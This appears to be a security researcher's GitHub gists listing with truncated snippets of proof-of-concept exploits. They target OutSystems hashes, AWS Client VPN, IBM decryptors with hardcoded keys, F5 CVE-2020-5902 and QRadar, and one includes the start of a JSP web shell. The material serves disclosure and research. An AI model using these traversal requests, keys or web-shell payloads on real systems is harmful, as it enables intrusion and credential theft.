ykoster’s gists

ykoster / OutCrack.sh

Last active October 25, 2022 12:39

Quick 'n Dirty PoC for cracking OutSystems hashes with hashcat

	#!/bin/bash
	# Crack hashes generated by OutSystems (PoC)

	# batman
	hash='$1$ms7rBI3MKLalgjmCFwavo5ROC/Cw5C6QXUxwgbUrAHw=131FFFE778BF3BD89911BBA49184A14DAA625B2FA2FA8D2C086BF35FF62539B046768E1885F43A7120199867B7AFAED9A53FD1A7C165CC12C8AE24370A792754'
	#hash='2A37D95E1EF22207DC6B09B55899B461'
	# hunter2
	#hash='$1$BYi7cMS7AXlNwKz/ozjUu9lhO83DjhNEDz5qPom78lU=2D2DC5245359DCC7F87E1D39E707E7AA1A4476D2346D5441104F29E412BADC64FAF2C6B182AD09B00AB26D5DC794456F7D75288F41E73AB440B2D8A52E3012CA'
	#hash='A8629A13DC6381CC9F2166C3A36232E3'

ykoster / Invoke-ExploitAWSVPNLPE.psd1

Last active June 15, 2022 12:14

AWS Client VPN < 3.1.0 OpenVPN config validation flaw can be used to escalate privileges (proof of concept)

	<#
	Usage:
	Import-Module .\Invoke-ExploitAWSVPNLPE.psd1
	Invoke-ExploitAWSVPNLPE
	#>
	@{
	RootModule = 'Invoke-ExploitAWSVPNLPE.psm1'
	ModuleVersion = '1.0'
	GUID = '656e7aa1-797d-42c9-ac70-4d50378f5457'
	Author = 'Yorick Koster'

ykoster / cicdecrypt.py

Created December 24, 2020 04:44

IBM Installation Manager imcl / imutilsc encryptString command decrypt script

	#!/usr/bin/env python3
	import re
	import sys
	import base64
	from Crypto.Cipher import AES

	val = '^(?:[A-Z0-9+/]{4})*(?:[A-Z0-9+/]{2}==\|[A-Z0-9+/]{3}=)?$'
	key = base64.b64decode(b'BTQOll+YFPIcsB+vMfXNTg==')

	def decrypt(e):

ykoster / ghcdecrypt.py

Created December 23, 2020 10:33

IBM Green Hat / Rational Integration Tester password decryptor

	#!/usr/bin/env python3
	import re
	import sys
	import array

	val = '^#com.ghc.1![0-9A-F]+$'
	key = array.array('H', [0x12FD, 0x4AAD, 0x4405, 0xE327, 0xA28A, 0x7211, 0x1111, 0x5543, 0x0CDD, 0x6A31, 0x4080, 0x217E, 0x7E73])

	def decrypt(e):
	p = re.compile(val, re.IGNORECASE)

ykoster / cve-2020-5902-tmsh.py

Created July 5, 2020 13:25

Proof of concept for CVE-2020-5902 - WARNING this PoC changes the password and shell of the admin user

ykoster / cve-2020-5902-check.sh

Last active July 8, 2020 10:02

Bash one-liner to check if a device is vulnerable for CVE-2020-5902

	curl --silent --insecure 'https://[ip]/tmui/login.jsp/..;/tmui/util/getTabSet.jsp?tabId=Vulnerable' \| \
	grep -q Vulnerable && \
	printf '\033[0;31mVulnerable\n' \|\| \
	printf '\033[0;32mNot Vulnerable\n'

ykoster / qradar_deserialize.py

Created April 16, 2020 08:12

Proof of concept for Java deserialization vulnerability in QRadar RemoteJavaScript Servlet

ykoster / qradar_session_deserialize.py

Created April 16, 2020 08:11

Proof of concept for QRadar session manager path traversal vulnerability

ykoster / qradar_php_lfi.py

Created April 16, 2020 07:55

Arbitrary class instantiation & local file inclusion vulnerability in QRadar Forensics web application (CVE-2020-4272) proof of concept

	#!/usr/bin/env python3
	import json
	import urllib3
	import requests
	import urllib.parse
	from requests.cookies import cookiejar_from_dict

	base_url=f'https://127.0.0.1/'
	username='admin'
	password='initial'

ykoster / pop_chain.php

Created April 16, 2020 07:51

PHP object injection vulnerability in QRadar Forensics web application (CVE-2020-4271) proof of concept

	<?php
	include("/opt/ibm/forensics/html/includes/license.inc.php");
	include("/opt/ibm/forensics/html/includes/simple_html_dom.php");

	$jsp = <<<__EOF
	<!DOCTYPE html>
	<html>
	<pre>
	<%@page import="java.util.,java.io."%>
	<% if (request.getParameter("c") != null) {

Yorick Koster ykoster